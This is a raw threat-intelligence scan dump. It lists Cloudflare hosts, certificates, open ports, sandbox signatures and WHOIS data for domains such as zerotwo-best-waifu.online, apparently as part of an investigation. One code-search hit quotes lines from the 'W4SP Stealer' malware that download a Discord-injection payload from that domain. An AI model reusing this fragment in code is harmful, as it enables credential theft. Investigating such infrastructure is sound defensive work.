u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'ridcasib.gq', u'summary': u'Date: Thu, 03 Nov 2022 18:06:43 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Hetdgi50%2BlJsbdeBEG9hrcAj0COviGuk1OztFT1J1FLwUJFj1ydJVL%2BKPyncE2BDENb1xZ3D3OSsickkQYM3m7dXoHs%2FgueihGk03aHW13EbmWt6O8MuxZipD2VQGQ%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76470ba428ad72d6-LHR\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: Raccourcis personnalis\xe9s dans After Effects', u'time': u'2022-11-03T18:06:43.4444222Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'172.67.137.37', u'vendor': u'', u'port': u'8443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731cbe0777147f6cea56397bac2a1a8fa1190649ae935739aeb', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'0', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.nonsvooquaca.tk', u'nonsvooquaca.tk'], u'cn': u'*.nonsvooquaca.tk', u'valid': True, u'not_after': u'2022-12-04T16:09:49Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'e62909e741efb1675526c76576ee45a0c99211c3675384247145be7582595e79', u'key_algo': u'ECDSA', u'not_before': u'2022-09-05T16:09:50Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'nonsvooquaca.tk', u'summary': u'Date: Thu, 03 Nov 2022 16:49:11 GMT\r\nContent-Length: 0\r\nConnection: close\r\nCache-Control: no-store, no-cache\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gbVcWHatvP07pS8%2BtPzgz0E1dXupaSMloKHp3%2B3iQLFkvhvuk8fMlloPTWSOo9pZv8%2B5i5LQ8k%2BY7AZt2MQ3TjjAUmZVTTGvdcbVfWeq01S11Y1F29bvH%2Bh63iu%2B8TvVkz4%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76469a0a1d91dcb7-LHR\r\nalt-svc: h3=":8443"; ma=86400, h3-29=":8443"; ma=86400\r\n\n\n', u'time': u'2022-11-03T16:49:09.75743523Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'172.67.137.37', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b932f45e5a9fa5e6523b', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Best Ardooie Belgium gay dating site', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'drawasbasmamis.ml', u'summary': u'Date: Wed, 02 Nov 2022 07:40:10 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sFm4jrNPbXGalRr%2FtQAxfY6IMOLWllOsvyD8uB2KZGM7KlwCdrYDveX2XR42ydLOxLlrj7oHSD%2BV1EI2tT41hJEiK2CxU%2FihywC1S6SnHTPPW%2FfRxOo25NlYo%2FhOw9nuZYg4zA%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 763b3874de5edd7c-LHR\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: Best Ardooie Belgium gay dating site', u'time': u'2022-11-02T07:40:10.302455138Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'172.67.137.37', u'vendor': u'', u'port': u'8443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc680132cf2d96aa19bf39cc2bf7', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://www.m6a5893.com', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'm6a5893.com', u'*.m6a5893.com', u'sni.cloudflaressl.com'], u'cn': u'sni.cloudflaressl.com', u'valid': True, u'not_after': u'2023-05-21T23:59:59Z', u'key_size': 256, u'issuer_name': u'Cloudflare Inc ECC CA-3', u'fingerprint': u'f9a105c5f311f952cf18e79b230288f10c89fabbad4478c1fec60a4bee2e3a2b', u'key_algo': u'ECDSA', u'not_before': u'2022-05-21T00:00:00Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'm6a5893.com', u'summary': u'Date: Wed, 02 Nov 2022 02:35:44 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Wed, 02 Nov 2022 03:35:44 GMT\r\nLocation: https://www.m6a5893.com\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=rwVkI9%2FRm5Yu8mCFhR8rCy0WnQ%2F8rTIeX5ZoMDQIP6P6LqpQUgKAcXceLPnV0mFuPKWTjgoaXCjTVhxOGb6AMnn507c1VwDSgnHM5KLf2IIyyeTWSDyUz3j5o%2FlGOQ%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY 172.67.137.37 2022-12-18 00:21:47 Open TCP Port No Censys 0 0 2 0 None 2606:4700:3032::ac43:8925:443 2606:4700:3032::ac43:8925 2022-12-18 00:21:51 Open TCP Port No Censys 0 0 2 0 None 172.67.137.37:8443 172.67.137.37 2022-12-18 00:02:44 Internet Name - Unresolved No grep.app 0 0 1 0 None atlas.plague.fun plague.fun 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 55 2nd PMO (Net ID: 00:01:21:10:61:00) 37.780462,-122.390564 2022-12-18 00:21:06 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77acb0e2eabe2243-ORD Content-Encoding: gzip 172.67.147.230 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2083 188.114.97.1 2022-12-18 00:16:57 Linked URL - Internal No Web Spider 4 0 3 0 None http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/custom.css?v=1.7.0 http://webmail.zerotwo-best-waifu.online/ 2022-12-18 00:09:23 Similar Domain Yes Tool - DNSTwist 1 0 1 0 None zerotwo-best-wa.ifu.online zerotwo-best-waifu.online 2022-12-18 00:11:20 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 5.0 Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. 188.114.97.1 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77a7df6a3f6b13ec-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.7.179 2022-12-18 00:24:59 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.192 90.116.149.183 2022-12-18 00:07:01 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://2.inicio12.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar10CC.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "142.250.191.42:443"\n "142.250.191.35:80"\n "142.250.189.163:443"\n "184.31.203.241:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"2.inicio12.repl.co"\n "ocsp.pki.goog"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fb0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_fb0_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_fb0_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fb0_ConnHashTable<4016>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4016"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_fb0_IE_EarlyTabStart_0xd50_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_fb0_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4016"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "SICQQ4HU.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SICQQ4HU.txt]- [targetUID: 00000000-00004016]\n Dropped file: "VKBQUO1X.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VKBQUO1X.txt]- [targetUID: 00000000-00004016]\n Dropped file: "QK4AWN5G.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QK4AWN5G.txt]- [targetUID: 00000000-00004016]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "Cab10CB.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00004016]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000320]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00000320]\n "6AC0056FF89500E2DC9650C3F49FB905" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6AC0056FF89500E2DC9650C3F49FB905]- [targetUID: 00000000-00000320]\n "SICQQ4HU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SICQQ4HU.txt]- [targetUID: 00000000-00004016]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3]- [targetUID: 00000000-00000320]\n "265C0DEB29181DD1891051371C5F863A_14F2E352CCFE495001982FFDAAC3BE84" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\265C0DEB29181DD1891051371C5F863A_14F2E352CCFE495001982FFDAAC3BE84]- [targetUID: 00000000-00000320]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00004016]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00004016]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00000320]\n "_2C16291F-4B07-11ED-AB07-080027AC508C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00000320]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFFB264EBDB98B9664.TMP" has type "data"- Location: [%TEMP%\\~DFFB264EBDB98B9664.TMP]- [targetUID: 00000000-00004016]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://2.inicio12.repl.co/"\n Pattern match: "https://2.inicio12.repl.co"\n Heuristic match: "2.inicio12.repl.co"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 2.inicio12.repl.co\nDNT: 1\nConnection: Keep-Alive"\n "@media (max-width: 500px) {\n .message {\n flex-direction: column;\n align-items: center;\n }\n }\n\n .eval-bot {\n margin: 4em;\n }\n\n .console {\n background-color: #0e1628;\n color: #fff;\n font-family: "IBM Plex Sans", "sans";\n padding: 1em;\n margin: 1em;\n }\n\n .footer-item {\n margin: 1em;\n display: flex;\n justify-content: center;\n align-items: center;\n }\n\n .link-icon {\n margin-right: 8px;\n margin-top: 4px;\n }\n\n a {\n color: #c2c8cc;\n }\n \n\n \n \n\n \n
\n
\n
\n \n \n
230
 os.makedirs(path+"\\\\W4SPStealer")
231
 paylaod = urlopen("http://zerotwo-best-waifu.online/778112985743251/wap/dsc_injection").read().decode("utf8").replace("%WEBHOOK%",hook).replace("%IP%",f"{getip()}")
'}, u'branch': {u'raw': u'main'}, u'path': {u'raw': u'OldWaspsVersions/wasp-1.1.1.py'}, u'id': {u'raw': u'g/aceeontop/wasp-stealer/main/OldWaspsVersions/wasp-1.1.1.py'}, u'owner_id': {u'raw': u'89152258'}} zerotwo-best-waifu.online 2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:80 188.114.96.0 2022-12-18 00:14:47 Internet Name - Unresolved No VirusTotal 0 0 1 0 None stream.plague.fun plague.fun 2022-12-18 00:23:30 Affiliate - Internet Name No DNS Raw Records 1 0 2 0 None tb-fr.securemail.pro autoconfig.zerotwo-best-waifu.online 2022-12-18 00:31:04 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: plague.club Registry Domain ID: D1C093C1CE747444390668EB5348FF659-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-03-20T06:18:36Z Creation Date: 2020-04-14T23:55:11Z Registry Expiry Date: 2023-04-14T23:55:11Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:03Z <<< For more information on Whois status codes, please visit https://icann.org/epp The Service is provided so that you may look up certain information in relation to domain names that we store in our database. Use of the Service is subject to our policies, in particular you should familiarise yourself with our Acceptable Use Policy and our Privacy Policy. The information provided by this Service is 'as is' and we make no guarantee of it its accuracy. You agree that by your use of the Service you will not use the information provided by us in a way which is: * inconsistent with any applicable laws, * inconsistent with any policy issued by us, * to generate, distribute, or facilitate unsolicited mass email, promotions, advertisings or other solicitations, or * to enable high volume, automated, electronic processes that apply to the Service. You acknowledge that: * a response from the Service that a domain name is 'available', does not guarantee that is able to be registered, * we may restrict, suspend or terminate your access to the Service at any time, and * the copying, compilation, repackaging, dissemination or other use of the information provided by the Service is not permitted, without our express written consent. This information has been prepared and published in order to represent administrative and technical management of the TLD. We may discontinue or amend any part or the whole of these Terms of Service from time to time at our absolute discretion. Domain name: plague.club Registry Domain ID: D1C093C1CE747444390668EB5348FF659-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-03-15T06:18:37.01Z Creation Date: 2020-04-14T23:55:11.78Z Registrar Registration Expiration Date: 2023-04-14T23:55:11.78Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T12:31:04.11Z <<< For more information on Whois status codes, please visit https://icann.org/epp plague.club 2022-12-18 00:16:27 Open 